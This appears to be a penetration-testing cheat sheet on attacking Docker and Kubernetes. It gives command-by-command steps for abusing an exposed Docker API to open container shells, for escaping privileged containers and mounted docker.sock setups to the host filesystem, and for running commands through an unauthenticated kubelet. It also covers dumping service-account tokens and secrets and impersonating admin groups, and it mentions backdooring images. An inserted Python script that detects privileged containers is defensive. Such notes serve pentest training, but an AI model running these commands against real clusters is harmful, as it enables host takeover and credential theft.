Docker Hacking
Exposed Docker API
When you install Docker on a system it will expose an API on your local host on port 2375. This API can be used to interact with the Docker engine, which essentially gives you the right to do anything you want, unauthenticated.
If you can make a GET request to the /version endpoint and it returns information about Docker, you have confirmed that the Docker API is exposed.
Once you have confirmed that the Docker API is exposed, you can move to the Docker CLI and execute the following command to get a list of containers:
docker -H <host>:<port> ps
Pop a shell on a container by running the following command:
docker -H <host>:<port> exec -it <container name> /bin/bash
You aren't limited to popping a shell on their Docker container; you can do other things, such as deploying your own Docker containers.
Privilege Escalation
If a container is run with the "--privileged" flag, it is essentially game over, as you will have full access to the host file system.
cat /proc/1/status | grep Cap
Execute the above command; the container is privileged if the output looks like the one shown below.
You can then enter the host shell by executing the following commands:
mkdir /tmp/mnt
mount /dev/sda1 /tmp/mnt
cd /tmp/mnt
chroot ./ bash
Not in container
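Defenders can automate the capability check above instead of eyeballing the CapEff line. The following script is an added example, not part of the original notes: it parses the CapEff bitmask from /proc/1/status text, compares it against Docker's classic default capability set (0xA80425FB, assumed unmodified), and flags host-reaching capabilities such as CAP_SYS_ADMIN that only appear when a container runs with --privileged or extra --cap-add flags. The /proc/1/status excerpts are constructed samples.

```python
import re

# Linux capability bit numbers (linux/capability.h) for the capabilities
# that matter when judging how far a container is from --privileged.
CAP_NAMES = {
    0: "CAP_CHOWN", 1: "CAP_DAC_OVERRIDE", 2: "CAP_DAC_READ_SEARCH",
    3: "CAP_FOWNER", 4: "CAP_FSETID", 5: "CAP_KILL", 6: "CAP_SETGID",
    7: "CAP_SETUID", 8: "CAP_SETPCAP", 10: "CAP_NET_BIND_SERVICE",
    12: "CAP_NET_ADMIN", 13: "CAP_NET_RAW", 16: "CAP_SYS_MODULE",
    17: "CAP_SYS_RAWIO", 18: "CAP_SYS_CHROOT", 19: "CAP_SYS_PTRACE",
    21: "CAP_SYS_ADMIN", 27: "CAP_MKNOD", 29: "CAP_AUDIT_WRITE",
    31: "CAP_SETFCAP",
}
# Capabilities a default Docker container never holds and which let a
# process reach host resources (mount, raw disk, kernel modules, ptrace).
HOST_REACH_CAPS = {"CAP_SYS_ADMIN", "CAP_SYS_MODULE", "CAP_SYS_RAWIO",
                   "CAP_SYS_PTRACE", "CAP_DAC_READ_SEARCH"}
# Docker's classic default effective set (assumption: unmodified defaults).
DOCKER_DEFAULT_CAPEFF = 0xA80425FB

# Constructed /proc/1/status excerpts, not captured from a real host.
SAMPLE_PRIVILEGED = "Name:\tbash\nCapPrm:\t0000003fffffffff\nCapEff:\t0000003fffffffff\n"
SAMPLE_DEFAULT = "Name:\tbash\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\n"

def parse_capeff(status_text):
    """Extract the CapEff bitmask from the text of /proc/<pid>/status."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.M)
    if not m:
        raise ValueError("no CapEff line found")
    return int(m.group(1), 16)

def decode_caps(mask):
    """Map a capability bitmask to capability names, lowest bit first."""
    return [CAP_NAMES.get(b, f"CAP_{b}") for b in range(mask.bit_length())
            if mask >> b & 1]

def assess(status_text):
    """Classify a container by its effective capability set."""
    mask = parse_capeff(status_text)
    dangerous = sorted(set(decode_caps(mask)) & HOST_REACH_CAPS)
    if mask & ~DOCKER_DEFAULT_CAPEFF == 0:
        verdict = "default-or-reduced"   # nothing beyond Docker's defaults
    elif dangerous:
        verdict = "privileged"           # host-reaching caps present
    else:
        verdict = "extended"             # extra caps, none host-reaching
    return {"capeff": mask, "verdict": verdict, "dangerous": dangerous}
```

Feed assess() the contents of /proc/1/status from inside a container (or from a node-level audit job) and alert on any "privileged" verdict.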
Docker Sock
When you run the "docker" command line tool it is actually communicating with the Docker socket. The socket appears as the file /var/run/docker.sock.
Developers sometimes mount the Docker socket inside a Docker container because it lets them manage other containers easily. This is typically done with the following command:
docker run -v /var/run/docker.sock:/var/run/docker.sock ubuntu:latest
If you can install Docker inside the container, execute the following commands:
ls -l /var/run/docker.sock # check that the socket file exists
apt update && apt install docker.io -y # install the docker CLI
docker ps # execute a docker command through the mounted socket
Now you can start a privileged container and mount the host's root filesystem:
docker run --rm -it --privileged -v /:/host ubuntu chroot /host bash
Successful access to the host.
Docker Backdoor
If you plant malware in a target's Docker image, every time the image is used to spin up a container your malware will execute as well.
Kubernetes Hacking
What's nice about k8s is that it manages the deployment of your containers automatically. If you want one container running on each node, you can easily do that. K8s makes orchestrating the deployment of your containers extremely easy.
RBAC AKA IAM
Role-Based Access Control is a method of regulating access to computer or network resources based on the roles of individual users within your organization.
When creating a Role or ClusterRole you must specify the operations and their corresponding resources.
Mitre Attack for Kubernetes
Microsoft released their own version for k8s as shown in the image below:
Initial Access
Exposed API
K8s exposes an unauthenticated REST API on port 10250.
Send a GET request to the /pods endpoint. The server should respond with something like:
From the above response we get the namespace name, pod names and container names:
Namespace : monitoring
Pod Name : pushgateway-5fc955dd8d-674qn
Container Name : Pushgateway
Send a request to the API service that will execute a provided command:
curl --insecure -v \
  -H "X-Stream-Protocol-Version: v2.channel.k8s.io" \
  -H "X-Stream-Protocol-Version: channel.k8s.io" \
  -H "Connection: upgrade" \
  -H "Upgrade: SPDY/3.1" \
  -X POST \
  "https://<DOMAIN>:<PORT>/exec/<NAMESPACE>/<PODNAME>/<CONTAINER NAME>?command=<COMMAND TO EXECUTE>&input=1&output=1&tty=1"
Note the Location header value; in this response it is equal to /cri/exec/Bwak7x7h.
To handle the websocket connection, use the tool wscat:
wscat -c "https://<DOMAIN>:<PORT>/<Location Header Value>" --no-check
As you can see, the command was run on the container and the output is displayed.
Privilege Escalation
List secrets
We are able to dump one of the service account tokens, which could be used to compromise that account.
kubectl get secrets
Pod Exec
If your user has the create permission on the "pods/exec" resource you can execute shell commands on running pods.
Connect to a pod:
kubectl exec --stdin --tty NAME_OF_POD -- /bin/bash
# view the token attached to the pod
cat /var/run/secrets/kubernetes.io/serviceaccount/token
Impersonate
If a user has the ability to impersonate a user or group, it could be leveraged for privilege escalation. They could execute commands as any user, including ones with admin privileges.
kubectl get secret --as=system:admin
kubectl get secret --as=system:masters
Enumeration
Infrastructure
You can use "kubectl get nodes -o yaml" to output a list of nodes and all their associated information.